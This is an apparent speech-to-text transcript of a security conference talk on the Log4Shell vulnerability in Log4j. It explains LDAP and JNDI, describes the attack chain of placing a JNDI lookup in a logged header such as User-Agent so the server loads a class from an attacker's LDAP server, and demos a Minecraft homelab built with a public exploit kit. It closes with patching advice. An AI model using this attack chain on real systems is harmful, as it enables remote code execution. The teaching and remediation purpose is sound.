 And this is the last log for J talk you'll ever need So a bit about who I am and what do I do I? Code I teach I hack in other words I spend most of my days on work and off bashing my head against the keyboard in the app sex face either to get code to work or to break other people's code and in that concussive stupor I also try to Stand on a podium stage, whatever and give insights on my experiences to everyone else I do I must add the disclaimer although I do have an employer currently. I do not speak for the corporate hive mind. I Am just one of its many cogs So Moving on to what we talking about on your left You see one of the most popular logging libraries in Java and on the right you see your ticket to shells and it's all about a pocket gaming a pocket full of shells and Do take note of the CVE don't get it confused with any of the other ones Like for example CVE 45 046 or any of the others They're nice. They're good their x their their ways of exploiting systems, but the problem is They require Effort and that's not what we come here for for log for shell offer shell isn't about effort and insight It's about getting arbitrary remote code execution anywhere and everywhere and so If you want to see the magical payload of what it takes actually exploit log for shell here It is it is just the J&DI LDAP Location via the IP report and the path to the exploit and let's just Take a deep dive and look into it unlike most acronyms and IT LDAP and J&DI are actually useful for explaining What they are so LDAP you'll see tutorials classes seminars everywhere about that the long and short of it is LDAP a lightweight directory access protocol is just file operations over TCP IP that's just using Internet web requests, how do you move files delete files create and edit files? So your basic file operations that you find on the desktop. How do you do it? do the same thing online and J&DI is just the Java name directory interface and so What why do you need to use J&DI? Why would anyone use J&DI in the first place is because Code reusability is the number one. So in each new project You don't want to define basic things like shared libraries or database connections configurations templates or for example setting where which logging server Which logging server you want to use you kind of want to have that code easily be reused Throughout multiple projects and the combination of these two both LDAP and J&DI helps facilitate that functionality and so just the Dot I deeper into the weeds LDAP is the number one provider for The NG MDI SPI, which is just so Is it so you've got your Java application globally and then the J&DI API and the naming manager and one of the best ways to explain the use case of J&DI is DNS So remember in DNS you don't memorize series series of octets and Just route to them Manually through your browser. What you do instead is you use a human friendly identifier like a host name So it's defconn.org Google.com etc. And then the service of DNS routes the human friendly identity human friendly name to the machine readable identifier and It's the same thing with J&DI You don't always know the exact path of classes and objects within the code base So J&DI is really useful for designating that designating that class path and If you go through Java Oracle documentation for Java 7 and Java 8 The LDAP is just the number one provider here and so It's one of the most basic and most common use cases for doing something like that Reusing the same code and libraries throughout the project Now we go on to the kill chain. So Log for it and this is for log for shell specifically You either spin up your own local LDAP server or if you take over someone else's Then you do anything within the context of the app what will cause it to log this can include this can include just Modifying the body of a post request But most often what you'll see in the wild is Just modifying the header a header that most all that almost always gets logged is the user agent And so when log for J went out most like if you wanted Walk around the internet and get random shells everywhere from everywhere all you had to do was just Change the user agent to a local LDAP server or one hosted remotely that you own and bam You would get audit arbitrary connections. So The lap the rest of the kill chain is the app who that are that just by including the payload Because the LDAP Because the LDAP servers automatically trusted The app will reach out to that server and the server will send a J and DI response Including the class and then within that class you can inject it to the process and get remote code execution from there And kill chain So To facilitate this and make this a lot easier Set up a homelab in Minecraft So it is built on vagrants using Buntu and Because you want to and of course One of the most popular Java applications out there there is a number of benefits on why This particular architecture than others Namely, I Don't have to code Java getting things to come I've spent Like days and weeks of my life trying to get things to compile with Maven and Gradle And I don't want to do that. I promise you I promise you I'm a developer. It's just for this particular project I'm just going to Use Ruby and by Ruby. I mean just enough Ruby to get some bash scripts in there a few works cited this all of these exploit kits are available at github, so The one these exploit that kit we're going to use feon-cs JV exploit that actually was taken down by who knows who but we but one of the benefits of that is that you can Find this sketchy exploit kit through the way back this sheet then use it with it our VM There are other exploit kits for there are plenty of exploit kits for The logfrater shell vulnerability most of these are just hey they'll automate and streamline the process of standing up your own JNDI compatible LDAP server Shout out to DA667 on Twitter mainly for the Minecraft version and the Java version, which is very important Java for this project. I'm using OpenJDK 1.8 0 and Making sure that the pass level is before 121 because from then onward arbitrary class loading is disabled by default So yeah, not only have to have a vulnerable version Vulnerable Java application You have to have the vulnerable Java runtime vulnerable log for J and for this particular project And for this particular project a vulnerable version of Minecraft because as Mojang has discovered these things It's gotten to the point where the basic Date time formatting that you normally were able to do in the chat Which is what dollar sign clearly bracket date time. It's gotten to the point where players are no longer to execute basic things like that so Moving on of course with every sketchy exploit kit use at your own risk. That's why we're doing it And without and without further ado, let's get into the demo All right, so hopping into the first command You don't really need vagrant destroy attack F at the beginning really all of this is was really necessary is just the vagrant up and the vagrant reload the vagrant up is to start the VM and the Provisioners and get that started the vagrant reload is just to you know reboot the VM and get the virtual machine working Vagrant destroy F is only needed if you need to blow it up and start again as I had to do many many times so right now we've got the vagrant up just loading up the GUI and All of this of course is Causes a vagrant box. It's listed in the vagrant file and all the provisioners are Included within that github repo as well the first part is what the head lit the GUI which is just the virtual box provider popping up The when you do it at home, but yourself just don't try to mess with it Or do anything the first thing they'll start is the TTY. I wanted to make this demo as simple as possible So I avoided Purposely made it simple enough to have the GUI start up before You do anything because there's no sense in giving you a VM to just have to wrestle and fight with Wasn't too. I wasn't ultimately successful. We'll see an error message That I'm still working out at the end The next part of that is is just recording the well downloading the minecraft acts assets and the exploit kit as I was talking about before the Particular script that I was using was was the feyong dash CS J&I exploit And of course a lot of there's an elegant solution involving, you know cloning everything And all that but since the repo was taken down just curling the A way back archive was the best bet here it does see the VM does appear to just you know stall and do nothing for a little while the reason for that is Because I just am tired of blowing up the terminal with arbitrary output Like the app get and installs are already bad enough So what I so what I did is just made this part quiet and silent If you have some networking issues, of course, this all crashes and fades away, but For the most part miss is just Getting all of the assets installing not only the exploit kit But Java making sure that all the environment variables are set and these things are batched into stages for each of the revisioners Onward and then shortly after all of the Minecraft assets and the exploit kits are downloaded. What we'll do is we'll just Wait for the rest of it to install then Do a full reboot one of the main provisioners that will always run is the serve Dot a SH Bass script all it does is set up two screens one will have the malicious LDAP server Set up and the other one is going to have the Minecraft server set up so There is going to be a big error and spent days days on this and for some reason just Graphics and drivers issues just would not we've gotten the way of this build But the server started out everything else is fine the Eula acceptance script is pretty easy to get around and You can dive all the details to when you see it in the repo for right now, we're just booting up the VM and then now that we've got a GUI just log in with the vagrant default credentials and Getting started another part of the setup is just now that migration happens have to have a Minecraft account It's explicitly set aside for this Yeah, just jump cut to avoid throwing the password out there Let's go and of course just so many so many loading screens the The Java version which has not showed is Open JDK 1 Dot 8 dot 0 with a patch level before one to one and for This particular job installation of Minecraft. I really want to target One dot twelve dot two. It's very popular. Obviously it's obviously legacy and One of the reasons is because of the modding community. So They're just gonna set play and agree now the one error that just was a Complete showstopper. I don't know why Cuz I'm thinking it's the distro or whatever and we can get to the other is just An array index out of bounds which I included in the repo Yeah, I promise you I got this working in a previous YouTube video and we'll just pull up the screenshots for those and discuss that instead but Yeah, after this loads up. It's just a ray index out of bounds error for some reason. It just cannot Find it cannot find the primary display. So Graphics issue graphics and display driver issues is just par for the course for pretty much any Linux distribution so yeah, it's just Graphics drivers issues and I by the time I got this recording in I did not have this issue resolved I am hoping by the time Present this in person that the issue is resolved Yeah par for Linux driver issues graphics driver issues, so Alternative solutions would probably Run this on jammy 64 instead of bionic, which is what I did in YouTube and if you hold up a second the error message should pop up ever so slightly it's no pointer exception and for some reason it's I Can this particular Install and configuration can't find open GL for some reason Even though like my display and everything works fine I've covered up the but that quick pop up for a second was a no pointer exception and The stat fold stack trace of course was available and get up the first screenshot is The actual payload within in the context of Minecraft This is taken up obviously from the YouTube video that I did for or the project when it recorded in December and The eight and the IP address is just you know the network configuration for this particular virtual machine the base 64 encoder payload is just L at is the LS command and you see on the right is the stack trace within the game and This is not the stack trace the server logs and you see like that Class name foo and that that's the JND. I output of Uploading the class name you can look into the exploit kit and you can use it for Verschel other commands Base 64 encoded and otherwise and that's it So let's talk about the impact here. I mean after all Minecraft is isn't really a good scenario for Simulating the enterprise impact of log for shell after all it is an application based on a popular cross platform framework hosted publicly with legacy dependencies a user base of hundreds if not thousands of users at one time and Actually is and is resisted updates of changes because it has Consistent revenue stream So yeah Minecraft is not in is of course never in a good example So what about remediation? So how about fixing this? It's easy to say just patch your systems. That's the number one key thing use better you The logging version of log4j is configurable Go into the configuration settings and do the patch otherwise Most of the Apache projects have already updated. It's no longer considered a zero-day However, some arbitrary application that's built on Patchy services may not be patched and in which case this is one of those things like arbitrary Remote code execution being exploited in the wild. This is where you this is where as security practitioners as professionals you could say nah, just No, I just changed your technology stack and That is that is the best answer the best way we can go forward with that so There are been other patch it other ways of trying to remediate using regex and all that Just really so seriously patch to one dots like later past one dot two dots one eight for log4j and move on so The reason why this talk is called the last log4j talk Rather than the last log for shell is because it's really easy when a huge vulnerability comes from a particular library that the library itself has no functionality utility. It's all about the number one global vulnerability That's sort of part of the risk with free and open free and open source software However This is just and yet one of those cases where a simple like one simple little library forms the backbone of digital infrastructure globally and worldwide and You may think like as if you're doing penetration tests and offensive security You'll find things like lack like for example jQuery and others Where it seems like instantaneous it blows up these libraries of vulnerable It blows up your scan logs and servers because there's always a patch coming on the security patch coming that's not necessarily a vulnerability that It is actually part of the feature and so part of It's not just part of a mediation process part of what makes What makes good application security? work in the world is just having a community Development and training community that is in line and coupled with the security community So that when something comes up the patch security patches are rolled into Rolled into the release Log and the blog for j developers actually did their best Before it was before it was just like disabling and all of that but as As the entire world had scrutiny on this one library for a period of a few weeks Removing the function out it eventually got the pushback to remove the J&I or arbitrary J&I lookup functionality altogether, which is Probable which is I know it seems obvious. It seems insane. Why would you trust? arbitrary lookups Remember no one ever it was a feature of the library Pretty much until November so part of going forward the part of the lessons learned is For every free and open source for every library package find it could find Part of it is not only just its feature set, but also looking into the community Does it release patches security patches often? Is it well maintained well funded? Is this something that you that you want to be able to integrate within your own technology stack? and of course these links active pretty much in way too many places It's free of sent so feel free to Harass me on any of these platforms and My favorite part of the talk the I'm actually portion. So if you have a question about setup What I did and also? Mistakes that I made feel free